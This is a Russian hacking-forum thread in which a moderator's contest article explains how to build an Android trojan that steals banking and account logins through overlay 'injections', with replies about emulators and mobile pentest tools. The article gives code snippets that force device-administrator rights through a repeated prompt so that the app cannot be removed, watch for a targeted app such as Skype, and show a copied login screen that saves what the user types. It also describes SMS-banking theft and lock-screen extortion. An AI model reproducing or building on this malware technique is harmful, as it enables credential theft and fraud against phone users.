Конкурс 12.2017 Похищение данных с android

Discussion in 'Статьи' started by DooD, 31 Dec 2017.

  1. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,176
    Likes Received:
    393
    Reputations:
    288
    Всем привет!Изначально хочу поздравить всех с наступающим Новым годом и пожелать всего хорошего!

    На форуме не особо рассматриваются мобильный хакинг, по этому я решил немного разбавить тему.

    начавши заниматься лет 5 назад изучением вредоносного ПО под платформу windows я повидал множество всего интересного.
    Однако , считаю (возможно я не прав) что с начала моего пути в этом деле ПК как платформа начинает медленно загибаться, уже все более и более становится распросранено мобильные гаджеты как то планшеты, смартфоны.

    Что скрывать даже я сам оплачиваю всякие покупки со своего смарта, пользуюсь мобильным банкингом все чаще ввиду его удобства.
    в данном очерке непосредственно будет рассматриваться платформа андроид- как самая распространенная на рынке мобильных гаджетов.Да и к тому же открытость операционной системы очень интересна для этого дела.Да и согласитесь что пользователи довольно активно доверяют данным коробочкам с экранами и микросхемами все свои дела)

    вспомним что делали разного рода вирусы и кони на платформе windows, я имею ввиду как они приносили деньги своим создателям? как правило это были разные методы: от краж паролей (кейлоггеры) до наглого шифрования данных на ПК и соответсвенно вымогательством денег за расшифровку.

    на андроиде все немного сложнее. Да можно и так же вымогать с помощью шифрования как это делалось на windows, но грубость этого метода мы рассматривать не будем хотя и оно имеет место быть)шантажируют обычно фотографиями или документами.

    так же у меня получилось в качестве эксперимента воссздать что то по типу winlock только для андроид- метод все тот же, заплатите а то мобилка работать не будет)

    но как по мне куда намного проще и красивее делать все тихонько, незаметно.

    увы в гаджетах на андроид редко бывает физическая клавиатура, перехватывать нажатия не как. возможно это делают по координатам дисплея или что то в этом роде-однако данный метод не совсем эффективен- у всех разные разрешения, у всех стоят разные клавиатуры, метод довольно не точный.

    Как еще один метод- это смс банкинг.Очень распространено среди создателей андроид троянов, не сложен в реализации, тих и прост.

    попав на смартфон троянец выясняет в региональных настройках место обитания его хозяина, либо установленные программы на устройстве и на основе данной информации посылает специальные смс для работы с средствами владельца.ответные смс троянец перехватывает, то есть в смартфоне происходит целая операция «буря в пустыне» а для вас все выглядит как обычно- но денег вы уже лишились.

    путь решения данного рода проблемы- иметь второй телефон, по типу нокиа 1100 для другого канала подтверждения по смс, но это не удобно, у всех все всегда в одном смартфоне.

    однако хочу рассказать о самом подлом и в то же время безпалевным методом кражи банковских(да и любых других данных) с помощью телефона, а так же точным.

    Отсюда хочу предупредить- я не буду выкладывать полностью сорсы, а приведу некоторые куски кода, продемонстрирую на фото и видео принципы работы данных программ, ввиду того что бы не быть ответственным что кто то использует это в черных делах.

    язык программирования для андроид- java.

    среда разработки- я пользуюсь android studio

    эмулятор- я пользуюсь genymotion.


    так же хочу сказать, что от версии к версии андроид притерпевает изменения, кое где приходится вносить правки.

    писать и тестировать мы будем на 4 андроиде- самом распространенном на данный момент андроиде из всех.

    итак в чем же принцип работы описуемого мной метода- это так называемые инъекции.

    смысл метода в том, что вредонос запрограммирован на перехват процессов каких либо приложений которые он будет атаковать,

    и при работе с данным приложением подставляет его ТОЧНЕЙШУЮ копию вместо оригинала.

    при вводе данных авторизации и т.п.- данные улетучиваются вам, и вы полный хозяин аккаунтов)

    есть два варианта- пишется html- php интерфейс который будет подгружаться с сервера злоумышленника (либо впихнут в ресурсы) либо это будет встроенное активити( активити на андроиде это компонент который грубо говоря как окно в windows)

    итак этапы работы:

    1)при установке захватить права

    2)запустить сервис который будет анализировать когда запущено то или иное приложение

    3)подмена активити приложения на свое

    4)кража



    Итак что бы запросить права нужно написать специальный xml файл, код которого можно взять в руководству к АПИ.

    (вообще в руководстве можно найти 99% информации, ибо это АПИ,а что не АПИ то пишется все точно так же как и на любом другом языке программирования)

    выглядит данный код таким образом:
    Code:
    <device-admin xmlns:android="http://schemas.android.com/apk/res/android" >
    
        <uses-policies>
            <limit-password />
    
            <watch-login />
    
            <reset-password />
    
            <force-lock />
    
            <wipe-data />
        </uses-policies>
    
    </device-admin>

    как его подключить:

    Безымянный.png

    в этой папке жмем правой кнопкой- new xml file

    далее этот файл нужно подключить в манифесте,

    в манифесте в .MainActivity добавляем следующий код

    Code:
    android:permission="android.permission.BIND_DEVICE_ADMIN">
    <meta-data
        android:name="android.app.device_admin"
        android:resource="@xml/device_admin_sample" />
    EN-US"><intent-filter android:priority="999" >
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
    
    </intent-filter>

    но! запросить админа было бы сильно просто)

    наша поделка будет запрашивать админа до тех пор, пока юзер не нажмет дать права)

    Code:
    .onActivityResult(requestCode, resultCode,intent data);
    if(requestCode != Integer.MAX_VALUE){
        if(requestCode != 0){
    EN-US">if(resultCode != Integer.MIN_VALUE){
                    if(requestCode != 0){
                        if(resultCode == Activity.RESULT_OK){
                            finish();
                            Intent as = new Intent(this, MainActivity.class);
                           startActivity(as);
                        } else {
                            setDeviceAdmin();
    получаем цикл который будет задрачивать нашего пользователя нажать кнопку да!)

    работает это дело следующим образом:
    ezgif-2-9a9a55ba7b.gif


    зачем нужен админ?- все просто, получив админа мы можем запретить удалить наше приложение, если его вычислят.

    к тому же права- расширяют наш функционал.

    2) анализ процессов.

    тут я не стал сизифов труд делать и писать, а взял библиотеку foregroundappchecker которую можно найти на github.

    здесь я опишу процесс таким образом:

    Code:
    AppChecker appChecker = new AppChecker();
    appChecker
        .when("com.skype", new AppChecker.Listener() {
            @Override
            public void onForeground(String packageName) {
                // пишем что будет происходить в случае запуска скайпа, а именно будет запускаться наш активити
            }
     
        )
     
        )
        .timeout(1000) // выставляем таймер следить каждую секунду)
        .start();


    3) при запуске приложения- вылетает наше активити

    наше активити- это в точности скопированное активити с программы откуда похищаются данные, возможно даже подделать теже действия на кнопки и тд.

    но – есть поле логин и пароль:

    они то у нас и есть фейковые, ничего не подозревающий юзер вводит туда свои данные, и мы их забираем себе в текстовый файлик либо передаем в админку)

    Code:
    public void Stealdata(View v) {
    
                  
    
                            try {
    
                                       FileOutputStream fileout=openFileOutput("file.txt", MODE_PRIVATE);
    
                                       OutputStreamWriter outputWriter=new OutputStreamWriter(fileout);
    
                                       outputWriter.write(edittext.getText().toString());
    
                                       outputWriter.close();
    
                              
    
                            } catch (Exception e) {
    
                                       e.printStackTrace();
    
                            } 
    
                }
    вот и все, тут же тоже наглядный пример как это работает:

    ezgif-2-18e19531b1.gif
    4) ДАННЫЕ у нас)

    небольшое отступление: что не было указано в статье:

    я не хотел что бы это было мануалом к написанию или копированию вредоносного обеспечения , по этому я не стал рассматривать стандартные вещи в программирование андроид

    как то написание сервиса, который будет висеть в кешэ все время.

    как то верстка активити- дизайнерское дело.

    как то взаимодействие с элементами пользовательского интерфейса( хотя в 3-м пункте это частично затронуто)

    какие эти элементы бывают, их функции и так далее потому что в одну статью этого не вместить, кто немного шарит в программинге под андроид (я и сам его недавно изучаю) тот поймет все аспекты в целом, кто не шарит- посмотрит до чего технологии дошли!)

    но если возникнут какие либо вопросы- пишите в треде, на все отвечу)

    всех люблю всех целую.!)
     

    Attached Files:

    _________________________
    #1 DooD, 31 Dec 2017
    Last edited by a moderator: 31 Dec 2017
  2. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    783
    Likes Received:
    912
    Reputations:
    58
    А что не конкурсная ? Очень хотел бы от спайдера про мобилки пару статей. Кстати, по поводу эмулятора, есть решение не платить за него и не приостанавливать?
     
  3. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,176
    Likes Received:
    393
    Reputations:
    288
    Конкурс,егор еще не замаркировал.
    Когда регаешь генимоушн просто выбирай типа для личного юзания,и оно стает бесплатным)
     
    _________________________
  4. uzeerpc

    uzeerpc Active Member

    Joined:
    11 Jul 2017
    Messages:
    161
    Likes Received:
    204
    Reputations:
    2
    Ежели чего, ещё есть MEmu (на сайте есть старые релизы с 4 ведром). На нём и остался в своё время, т.к. Genymotion не завёлся.
     
  5. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    783
    Likes Received:
    912
    Reputations:
    58
    Из всех что тестил, Genymotion самый крутой
     
  6. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,176
    Likes Received:
    393
    Reputations:
    288
    Хорошо потестить игрули - bluestacks.
    Генимоушн хорош для отладки именно программ.
     
    _________________________
    VentaL74 likes this.
  7. muradddddd

    muradddddd Member

    Joined:
    19 May 2017
    Messages:
    137
    Likes Received:
    8
    Reputations:
    0
    Droidsheep и dsploit кто нить пробовал проги жалко что на андроид 4.4 киткат работоают и с рут правами толька
     
  8. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,176
    Likes Received:
    393
    Reputations:
    288
    Дроид шип-не работает уже.
    Дсплоит работает хорошо,ставишь бузибокс и погнал.рут обязательно нужен,это системные вещи.
     
    _________________________
  9. uzeerpc

    uzeerpc Active Member

    Joined:
    11 Jul 2017
    Messages:
    161
    Likes Received:
    204
    Reputations:
    2
    Уж тогда cSploit может? :rolleyes:
     
  10. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,176
    Likes Received:
    393
    Reputations:
    288
    да те же яйца, ток обновленные)набор разных утилит и эксплоитов а-ля метасплоит.
    аналог есть такая штучка- zanti.- пентест вифи сеток.
    да и еще там какие то утилиты есть.
    принесут мой мотор попробую еще мини-видео запилить
     
    _________________________
    uzeerpc likes this.
  11. muradddddd

    muradddddd Member

    Joined:
    19 May 2017
    Messages:
    137
    Likes Received:
    8
    Reputations:
    0
    Да csploit и zanti плоха работеает на андроиде выше 5.0версии. intercepter ng хорошо пашет на андроид 5.0
     
  12. Mwoy

    Mwoy New Member

    Joined:
    6 Apr 2018
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Неплохой разбор темы. Мне понравилось
     
Loading...